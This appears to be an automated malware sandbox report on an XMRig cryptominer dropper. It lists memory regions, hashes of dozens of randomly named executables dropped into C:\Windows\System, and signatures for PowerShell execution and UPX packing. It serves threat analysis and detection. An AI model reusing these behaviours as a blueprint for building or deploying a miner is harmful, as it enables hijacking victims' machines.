memory/3020-4-0x000000013F670000-0x000000013FA62000-memory.dmp

memory/2244-8-0x000000013F670000-0x000000013FA62000-memory.dmp

\Windows\system\bNRpHVS.exe

MD5 21cd617de842a7d9d0609bb910f62dd5
SHA1 1e51ee72c0407d79d90502c2b663824ab672bef9
SHA256 c87b29931b39fa7d4f3600480a6837c967d26d312b113a8db3d0b1731921ede6
SHA512 8a08b922b4baef24a48a89638214370278ce6e4f93a52164ed0cc7934a67d05bbd2a5a052849e0177845aa7315cc22f9559a2825c58b65cff172d9fd6330b180

C:\Windows\system\bJUJtdQ.exe

MD5 178114ae79f794217ae5e625f3778fae
SHA1 a92cc4f40faa7fc83e571b9917b3be9d6c97af5c
SHA256 c9976ecfc59185f69f69d10455c17515d7fa60e9ea0bdccbbfd37100cd787f73
SHA512 512532d84e7c78057a10d9132b6af21281afec912f427f8239059338250b634057e4ca2e6095c0143e2e59c4df9c95069bac1c5eb254fbe0cb594c8ba179ec14

C:\Windows\system\LPrQCdv.exe

MD5 49382e00d0526e95a45420b75c616b71
SHA1 2861b669409b45a22818cae622ac7fde02b8bd4e
SHA256 4afd92bbfca81dec160c40e053e22f8335f2b317c564f1bb92ec95c0946a13c0
SHA512 d5fb33e9e2e7db785752c7d28b116dfcd5ca56ef08391b8d32409c7241d381e381b67f24fde32c72fe0b2dcc040049523a6e8fffbcfd04e4557de672cbcd5394

C:\Windows\system\QdOUEfh.exe

MD5 1a2461c81d0a236a1dd7bbc3ff8dff67
SHA1 8f86fab0982b3d7389b7a66faec19047cc388d69
SHA256 27ce221e2a4b0ba798afcef6094d933b1ebf718e1843bf65cdd062f82aa91f6c
SHA512 a8c6640790ceafedd413926c6f3f44ce18a0b18062ad4ad0ee58e101c3967d9012605a97f4c6525bb5f5aa5d3389f07240ed23347a9ee8d332b59e340f2cb9cc

memory/3020-31-0x000000013F0A0000-0x000000013F492000-memory.dmp

C:\Windows\system\uKjlAqU.exe

MD5 b4c93df7d29d8c1e823d0bd4c6d7596e
SHA1 8f121cd4636a8658741cdc719d11d2b11455fdff
SHA256 862dcd40b9ce504c3ff66c91357ef981de7d6fbf14d8fdae900df3ac933d73d4
SHA512 c4f75a2e1763dab5ec0daaf5738fb44e780fb51f92db3132544f1b3b91b61a83065bb3ba22742a9c8802f13361aef4bae0df6c3da2918b69c68c399ffd21a07d

C:\Windows\system\hoJfAQC.exe

MD5 5d22200a6ec1104cd360a98ddd3b8438
SHA1 9ec9970f93b4d421ac2e72ce8503dea53e3e5205
SHA256 1ea418b81720a91d807b6d2a01bcb7d5e7ed5384ccef2b41d655d74292199792
SHA512 5ec8792a26d4dd06df7e53917b4dc5e0300ec8b0b757cf54ef453f5aa73d21f274eadb4e96e92941b7387e73a58e77f08221cc971ec74c7a8be767279e1bf1ac

C:\Windows\system\bpwZIed.exe

MD5 ae00bfdac1b255393ecf1a5d8a558caf
SHA1 4d3f3e74cf95b70b067713bdffed0c6fb01a4b10
SHA256 cb8556d6f2dcc393fc813597389bd21bbe39d637cb7808853de66ddf95f021ee
SHA512 4de445e0e8481a3315c94e79cac11ed7f8b583ccd8a46a5ce98c424a4b40c54409b82a12395114a4691cb2264f7b2ed3c107309fa67bdb1663d797367c3d5416

C:\Windows\system\FaxkFPF.exe

MD5 c2e38583f98a5567dfe9ea59cc8bd4a9
SHA1 f0acaecf739f4004f6e946ab103ff4e67b2115aa
SHA256 8d5884da7976bbb591f6e3301927e794c4d3afd5d493dc4ed7317af2a549f73f
SHA512 84691e93132514c00c76b096cc02468242295a6347c6bf50ce6d2ecf12e8c7973b97f49ab7c094dae1d1696fc1f2c94e6406d57b83f0e82f149a7d5618d19a16

C:\Windows\system\UHnPMjp.exe

MD5 e1a12b6d93f83f98c52cf3fe15a786dd
SHA1 66526e876ef54b732656f2165a5816130e18f9b4
SHA256 0d454a4a0c2bfed4f0a752064cbf2be0dd97d8e77b8ec666486358fb55b71ee5
SHA512 7659621be2ea6cdd305affa366ee66961e9982b513c3e5ec6d832ed2c7879ab6dd680ee8175fb01008103f1d99eba8a23f9d77006b9e924c736318c8ec46ed04

\Windows\system\uOBfAzd.exe

MD5 085fb639c3ff8c4ee833ef0ad5b37db8
SHA1 7d90cd2a3cec09b6bd799a285c113e352b341c16
SHA256 8dfb82dbbac17bf1d991a71e244245ab4d3207e0512cef7596ccb5cf5b34d926
SHA512 6d1a643f953af39b944ca77e41d9607b9fad92a5192d47b1e53727450131a774698cab313cc38279ebdd274b2037af4bb5482ca96c9eb35bb2623312ea6f1406

\Windows\system\jIUxMZJ.exe

MD5 34d5d5a342fda086d5bd3506d1ee5c63
SHA1 228083701da801a50a12341780f3472125b0702b
SHA256 e7c22ba1ace3ffb80b873e9ce46dbfa9c5a245198dd9de4f67f577ec049f2ee0
SHA512 42c925b3203d2c506e4d3ee8e49e895dc169137cd12037da01d090335c3c82d58945c8f815227953ddf3ead8581dcba732490cb4e608f5ca43ce607410c1b538

C:\Windows\system\HpKEuAW.exe

MD5 5e87c5883257aed2c5035244d49a4912
SHA1 e56cf2b12d3130f37fb5777fbfe3c470922a8476
SHA256 542088688dff0dd4cd0bb364e06e9cd3ebd93ef111e6408bd8324c4c53c40501
SHA512 eb84d2f9c359dbf82c06dfb2d4423c7690abea1965baa787a14c95dea3687fbe71c48165c008ad3dedbe8ab0cd40809f4738c251d032c9c6299ad7a7d1d3f26e

C:\Windows\system\pHVBVGJ.exe

MD5 d59109b524722a29fcc25cd7ed00e881
SHA1 480cabb047c93b503296c9a7c95cd48d1e8444ce
SHA256 239b43dda4a9041de80567d906e555530b906bfdf8014a5f83fddf69ad99647a
SHA512 e2e1de1d9999f0e438ab716d93b43b8ab5259c23bdd2d87a5588bc0ea605565bd03b478b1dff246e39fe783356b555094388a7c9fc932ee2f409017daa63f87e

\Windows\system\jyBztnc.exe

MD5 8155a5016805b9c7fb24d1ffc10477a7
SHA1 8a34808ebe66f46b84cde92b96b4ff5d0a692506
SHA256 7ddceda25245dfb5d07188d8b3dbd63f0e87c1715a71ce5581fc20222090c4e8
SHA512 c67f925f1fed741c33338d35ae21eec55a4dd1e73faf21d1adcca424ba1f20118dc0aa2d9282bb1da6253f0aef9610794ec54036d9803e150b5b8f8f2f89b328

C:\Windows\system\ffuapkA.exe

MD5 a64f186e7de7fe86dc80be7acb4ca10b
SHA1 52fea7a9fc15999ebd534d9bfa38375518d398d7
SHA256 78da9fec9b2dd6e70616c8e3941be8e9619fd40ffa23d4ef94b6f99ffdb98132
SHA512 eb20b13086dd026b980b7e4ccef50c2437bdf595c225c753b2469ad8d0f6cf208874089af0e60be22240e4511d9fd8fcd8ef12aee0f1fc45546ca104521b0811

memory/2992-176-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp

memory/2652-180-0x000000013F7E0000-0x000000013FBD2000-memory.dmp

memory/2992-186-0x0000000001EE0000-0x0000000001EE8000-memory.dmp

memory/2992-184-0x000000001B750000-0x000000001BA32000-memory.dmp

memory/3020-338-0x000000013F380000-0x000000013F772000-memory.dmp

memory/3020-290-0x0000000003540000-0x0000000003932000-memory.dmp

memory/2992-360-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp

memory/3020-333-0x000000013F070000-0x000000013F462000-memory.dmp

memory/2992-332-0x000007FEF52E0000-0x000007FEF5C7D000-memory.dmp

memory/3020-329-0x000000013F930000-0x000000013FD22000-memory.dmp

memory/2508-327-0x000000013FF00000-0x00000001402F2000-memory.dmp

memory/3020-326-0x0000000003540000-0x0000000003932000-memory.dmp

memory/1512-325-0x000000013F370000-0x000000013F762000-memory.dmp

memory/3020-323-0x000000013F370000-0x000000013F762000-memory.dmp

memory/3020-322-0x0000000003540000-0x0000000003932000-memory.dmp

memory/2404-291-0x000000013FF70000-0x0000000140362000-memory.dmp

memory/2904-288-0x000000013FC80000-0x0000000140072000-memory.dmp

memory/3020-286-0x0000000003540000-0x0000000003932000-memory.dmp

memory/2740-285-0x000000013F4D0000-0x000000013F8C2000-memory.dmp

\Windows\system\tgkObNU.exe

MD5 8a40bc072866afea7a6c77dd92a4996c
SHA1 3d0ce96b1aec75ec53f11610bec922365995ed40
SHA256 38c778975654040056fc22c1791f16a716397935b13205a5b72b282bb2d75554
SHA512 416d08ae690c9e2584b7a7bbd18c9debe16fad1153036ae6b78a15f24e591c01ae3ea8f996475e93d01a9793f04e9964deb491e87f6293bff9138a2221a07724

memory/2456-179-0x000000013F380000-0x000000013F772000-memory.dmp

memory/2764-178-0x000000013F070000-0x000000013F462000-memory.dmp

memory/3020-177-0x000000013F7E0000-0x000000013FBD2000-memory.dmp

C:\Windows\system\AbaZMuB.exe

MD5 bc17a6e94e519f0a50b6ba96d4cf2611
SHA1 89fd8ba221ac54a0df6f2d6423afa3d6bd77ad62
SHA256 bc6a726c2cac5157c5493b1c0bfd60c5304740e91559051499ccce6b2784fcd7
SHA512 9c208608ab61189ba3bfe4cd2639a462337212eace731e330ed9e80ccd9cb297a8251b52859e593eb5a4e79f57c232810a86f67523d732a832f34918e1e092c0

\Windows\system\StCUCZJ.exe

MD5 0faa7ddbe667740f28fec37029f6f960
SHA1 95ef56f2a6fb4e890e6f588950c00d1a7c252d8a
SHA256 baec23582c4e5b02a168632559cd7f6d9e190dd42bc9880170992da3017d2aa4
SHA512 e787081b5020879d2a9e4d1100c11cdea365693602ee4e339aecf4cf215c69f00a63f8e38841d8c60bb41805f419fe36408a31404fd6104a9e8df7c5f9ad95de

C:\Windows\system\XmWxnXo.exe

MD5 a300448a9c2c4ea1266bee9010420f23
SHA1 2857bff5564776114cbcdc1f96d9d5ab2aff0a50
SHA256 83e7971d05f3741f31d969ebe3c8f8e8fd560f67f92d0de0b984eba1eeeb8850
SHA512 80e166268e4b1989fcb9b3af4559f8c1a8e5e7fcf191c6f578c16e0eed3d7726b2f6446c13bc3f83d44c2b15ce4a7e8bbbf8f37209171eea242a391d9d7a0184

C:\Windows\system\VTvselR.exe

MD5 c76e78c7a5d3e74192e377dd09913392
SHA1 5fff769ec181b34f787691ad7b74f091466db7bf
SHA256 5e384d862811496a9cbe0eb16c4c156f161b1025233018d4af5583e111fccd98
SHA512 c6f3b4311182f0b2b7856ec359e8fdd62d986b48ba7b4dce44c6c5e2e68dff9cd55e895e7f42c1aeef360a03069205f31afdcd4f86a3fed59cda0a8f95906842

C:\Windows\system\DrRdccK.exe

MD5 5ced8b369521ee3e2665424c66767046
SHA1 af4414d65afada68466939eb3b06a574ccc19891
SHA256 000d9e69b569fc2a8822e6ece84ff67e7d32a7654b0cd24de09097cd11020aa8
SHA512 8ae32b455715a154d8110c069a0a04106847b81831314f022a09d981c325b6fe762b8c846ad896e91faebb82b922346689457d07d642b2a680e523f1fcd5b299

\Windows\system\uVUfCjX.exe

MD5 fcb856b0bee2473e703e76053222a9cc
SHA1 5d1cd5f7fc2347faad22f189fcec754dc527e3b1
SHA256 b6fbfbf87f5d3871c2992dc82c1e1f95c004280ed9f7f6e44f09e374b19ed1b3
SHA512 9bbb03ad65f30dbceab1464c8e322a8ee56cbdb0fc54ee975a8e63a0b8d477c4ecda48097d6770cf0062aed0a137c26f24885821e8d3b144e82af700ef0ce373

C:\Windows\system\eyHfxQi.exe

MD5 8e91b6cb687351fe3e50dfb073f11a09
SHA1 4b4ab8d4f36bd928e807caa2e87a1b34bb45e842
SHA256 a2dd46ebd841b03bfb51505826694de7c8df432e0bc1eb6da978400f2e4924b4
SHA512 c46d910ef979f19014a7c20ffb812600f77535fcbaff99adff2822f369c96caea0790582dd0064d3c458e4eec456e285525d21ae88e3a2b134b89f48cafff3ae

C:\Windows\system\NJEiDqJ.exe

MD5 c4453109e312930ae4825fb8002afb5b
SHA1 66b609a5f88eb167562263dc7e23cf910c22007a
SHA256 eda68242ab25711853699833882d2d3c23ea70bc3a53c59cc3c2bd067b8ee705
SHA512 360246e72d0947b0d15b1e974dccc37416c8493b4f75d30c05440fdc0660bcee7a19e1c8e7d496583ed06ebbf4fde6e9f7065632a3efe85e2818c29c75271227

C:\Windows\system\lXBNLdb.exe

MD5 edac49740afea99cfeba70e8ca69db2d
SHA1 f47a90ef7e13a2180e5770eb95ba65f3043c8a22
SHA256 bf3644169369bdf0f619c98575c0e06d4a55fb3fb43e4ddfdb5e4f808a932181
SHA512 37e76781fcb59bd0c368ed3daf143885be6bfee821243c8f12e6a3e202a7c5a06ff6c42377ddd81793edeb55a57f2ee109a2254e325f2e2120c9eab18ddb75f2

C:\Windows\system\zPDOXMq.exe

MD5 0f2a989f05714cc96e47b5538785531c
SHA1 aed31eef8015f129a1f728f4d8957198577dea8a
SHA256 e3f791fadf892c0428557f6fdb0f55fb21dadf983a56fe8c21d0250e03baecb3
SHA512 c56ee6e0494528a661dcb15ee112cd8b711e3e694fd5a41db9764849cb20912face9fda0f0df434339e446a1d12f18a0d28d48e0e34474b41f3973d21112b3db

C:\Windows\system\sjwyJAC.exe

MD5 7887f177a024680e6bc5acc7164e95b3
SHA1 7d6a0b20855bd88cd59305ddbd1825b653d8138e
SHA256 a43169aa80d73621ba3827f408099859e5a7bb205d93a02faef3a3bbeebe4a17
SHA512 82f8f32bf42091640a9322aaf315a1ff30bcb33e3be1334e1241e41684b6bbdbd03fd343dd040398dbddf44a79a3c89d98bb5c66a4578fa03af640fc020063f5

\Windows\system\htbFqvr.exe

MD5 0da8d293956092c6ffb8204befe4ec52
SHA1 1400ed9e0c5b504e3333e987c29c79fa8b895f53
SHA256 77c374ed20b944d3fd9545e8734a8d3a5a2f432a80af6670dcc24fe1d364a2f6
SHA512 7aa06aec48a79b1dd9e50796f20df27ed9e3e173829bdafaa3408bb60ae29727e40b4e5dd886989f2eaef6cc4cc775b87924a3494360a0cadb7eb31490516c67

C:\Windows\system\WKLHFqB.exe

MD5 596a73fb4c3bb084c767f085637596b5
SHA1 2fb2eb08190c8ef6706dd2ed0109bde44dfb1bf9
SHA256 1b11fdf9b2007f3d4aed69a7d972da3290c47141ca879bd2be822027522e69d3
SHA512 1e3410c1a867598b526107718e8e004c23358f03f495d7db025184ecc9fc943542168c96a9a4018e9d15276d5c337c5d8a7554bbdc3a4efff4d01a1b56130b9e

C:\Windows\system\WwRuaRU.exe

MD5 41561fbcceb45fc89482c7a81b45cafb
SHA1 4022465370e33bd0a14c7aecad043e38e1106a8f
SHA256 34f91dd1fc014c130dd91e2493f26a7391441b68d589abe125db0a40d031d40a
SHA512 b46a9dbf9288fe0be41de85fd609285dfe35eae30c9f3b639f88766072e1540522be12abfe2fe63a901bd82ae24961e4aa86a443a112cf941371b9929ad94254

memory/2756-38-0x000000013F0A0000-0x000000013F492000-memory.dmp

\Windows\system\oDTueRt.exe

MD5 47406d2524a863d4625b7b56c49beb5c
SHA1 273a1747c626c29700b9048a99b9a83df6e7b581
SHA256 4b3cd64721f228546d78200ae0e3302aa54ccb58d418950888fe7dd040076f0a
SHA512 dd663485f14f1483569eeb34f76e37cdfa4e6d6cd2b7ea9191e77511d4dcad0f6fcddc363d60014ef646e2845af577b6785e7cc38f3fec0a4f832c3c8fb08428

C:\Windows\system\rxSqzQn.exe

MD5 91b4477865a7cab3ac311602be4a9f96
SHA1 3b83ce87e72c64de5a2d14b34df1b2eb00067d23
SHA256 c02ac5337e907907050f1033dddf9c1818709413827a38c31e5fc6b37557e52f
SHA512 f8b589a0879ef4b64361a23e0374181eba44f61b781fbf242ea98860c1e9528b0f414c898347bfa487996529c652b94d8df52569c1128375b173227a8330ca88

memory/2992-21-0x000007FEF559E000-0x000007FEF559F000-memory.dmp

memory/2992-20-0x0000000002C70000-0x0000000002CF0000-memory.dmp

memory/2656-19-0x000000013FCE0000-0x00000001400D2000-memory.dmp

memory/3020-15-0x0000000002E20000-0x0000000003212000-memory.dmp

memory/2656-5378-0x000000013FCE0000-0x00000001400D2000-memory.dmp

memory/2508-5380-0x000000013FF00000-0x00000001402F2000-memory.dmp

memory/2652-5379-0x000000013F7E0000-0x000000013FBD2000-memory.dmp

memory/2456-6006-0x000000013F380000-0x000000013F772000-memory.dmp

memory/2764-6005-0x000000013F070000-0x000000013F462000-memory.dmp

memory/2756-6007-0x000000013F0A0000-0x000000013F492000-memory.dmp

memory/2904-6045-0x000000013FC80000-0x0000000140072000-memory.dmp

memory/1512-6772-0x000000013F370000-0x000000013F762000-memory.dmp

memory/2244-6770-0x000000013F670000-0x000000013FA62000-memory.dmp

memory/2404-6769-0x000000013FF70000-0x0000000140362000-memory.dmp

memory/3020-10000-0x000000013FDA0000-0x0000000140192000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-06-13 13:43

Reported

2024-06-13 13:45

Platform

win10v2004-20240508-en

Max time kernel

64s

Max time network

48s

Command Line

"C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Windows\System\CVKMpwz.exe N/A
N/A N/A C:\Windows\System\QLNcKnJ.exe N/A
N/A N/A C:\Windows\System\tzreqhD.exe N/A
N/A N/A C:\Windows\System\yDdqgIA.exe N/A
N/A N/A C:\Windows\System\SxGixoo.exe N/A
N/A N/A C:\Windows\System\SPgeosr.exe N/A
N/A N/A C:\Windows\System\VZtQtyg.exe N/A
N/A N/A C:\Windows\System\gnmGXGG.exe N/A
N/A N/A C:\Windows\System\ouiSHWw.exe N/A
N/A N/A C:\Windows\System\XdLasvE.exe N/A
N/A N/A C:\Windows\System\SdHsZCs.exe N/A
N/A N/A C:\Windows\System\mfzmYQh.exe N/A
N/A N/A C:\Windows\System\XXglGNM.exe N/A
N/A N/A C:\Windows\System\QLiOhwv.exe N/A
N/A N/A C:\Windows\System\NrqgsOy.exe N/A
N/A N/A C:\Windows\System\yKIliFL.exe N/A
N/A N/A C:\Windows\System\AeSuOMk.exe N/A
N/A N/A C:\Windows\System\PHLzuHf.exe N/A
N/A N/A C:\Windows\System\vngnkni.exe N/A
N/A N/A C:\Windows\System\MBGmdpk.exe N/A
N/A N/A C:\Windows\System\UmSEoJT.exe N/A
N/A N/A C:\Windows\System\EkeJagX.exe N/A
N/A N/A C:\Windows\System\SOgxXDE.exe N/A
N/A N/A C:\Windows\System\GPVODEt.exe N/A
N/A N/A C:\Windows\System\paILezr.exe N/A
N/A N/A C:\Windows\System\PgxEHLy.exe N/A
N/A N/A C:\Windows\System\TtGlCwY.exe N/A
N/A N/A C:\Windows\System\AhEUvLG.exe N/A
N/A N/A C:\Windows\System\QusIQhI.exe N/A
N/A N/A C:\Windows\System\ZQWlwcv.exe N/A
N/A N/A C:\Windows\System\IQfhGhr.exe N/A
N/A N/A C:\Windows\System\NnMXJgV.exe N/A
N/A N/A C:\Windows\System\mdnLpzP.exe N/A
N/A N/A C:\Windows\System\CeSQuEM.exe N/A
N/A N/A C:\Windows\System\TBszrIx.exe N/A
N/A N/A C:\Windows\System\hFirPgW.exe N/A
N/A N/A C:\Windows\System\majjVIy.exe N/A
N/A N/A C:\Windows\System\CgyNqBj.exe N/A
N/A N/A C:\Windows\System\BrydNGm.exe N/A
N/A N/A C:\Windows\System\jiIhIWM.exe N/A
N/A N/A C:\Windows\System\CFLUWpe.exe N/A
N/A N/A C:\Windows\System\OZuvJug.exe N/A
N/A N/A C:\Windows\System\YouiTpz.exe N/A
N/A N/A C:\Windows\System\qCzsVxt.exe N/A
N/A N/A C:\Windows\System\qDrByaq.exe N/A
N/A N/A C:\Windows\System\zsGrXMg.exe N/A
N/A N/A C:\Windows\System\BHjQPnu.exe N/A
N/A N/A C:\Windows\System\veiTAaf.exe N/A
N/A N/A C:\Windows\System\jUYONQs.exe N/A
N/A N/A C:\Windows\System\VLbwReR.exe N/A
N/A N/A C:\Windows\System\aYuxTlf.exe N/A
N/A N/A C:\Windows\System\zpAhaOs.exe N/A
N/A N/A C:\Windows\System\LtolErA.exe N/A
N/A N/A C:\Windows\System\ULQMsjT.exe N/A
N/A N/A C:\Windows\System\XTYEdbe.exe N/A
N/A N/A C:\Windows\System\wcgUGDW.exe N/A
N/A N/A C:\Windows\System\YVQiNFr.exe N/A
N/A N/A C:\Windows\System\EFFSXwq.exe N/A
N/A N/A C:\Windows\System\iJNCoPp.exe N/A
N/A N/A C:\Windows\System\sNJUfdD.exe N/A
N/A N/A C:\Windows\System\panShYc.exe N/A
N/A N/A C:\Windows\System\zxPOkRw.exe N/A
N/A N/A C:\Windows\System\oRNywOA.exe N/A
N/A N/A C:\Windows\System\zelktRs.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\System\jzrfmoi.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\vsVUQWb.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\kJcuwwg.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\xRRtnPx.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GxHpaOz.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zDZgujR.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\nmfzvJh.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\neWMYVP.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\CxpJUeh.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PmjVihf.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\zSwHYup.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\tecXkSG.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XPqFjLV.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jDRRUdr.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XNrjgio.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\jZkHVeX.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EKbMofR.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\WYkGzyg.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\UNolBTf.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DzrZUxp.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\DaWMRrs.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OVbCbrK.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\XFjqymt.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\SyIUhMG.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\AAsJJpG.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\PEyaILi.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\aaeddLU.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\KatlOmR.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\GRHGLQo.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\RYCmaIb.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\TSZfNtc.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\siboBDc.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\mYYceVb.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ibszuaf.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\EcBztIp.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ParKjAV.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\OZuvJug.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\ngnaxJH.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
File created C:\Windows\System\bGZTFPU.exe C:\Users\Admin\AppData\Local\Temp\80f14c6b8a45a23921419be2149951b0_NeikiAnalytics.exe N/A
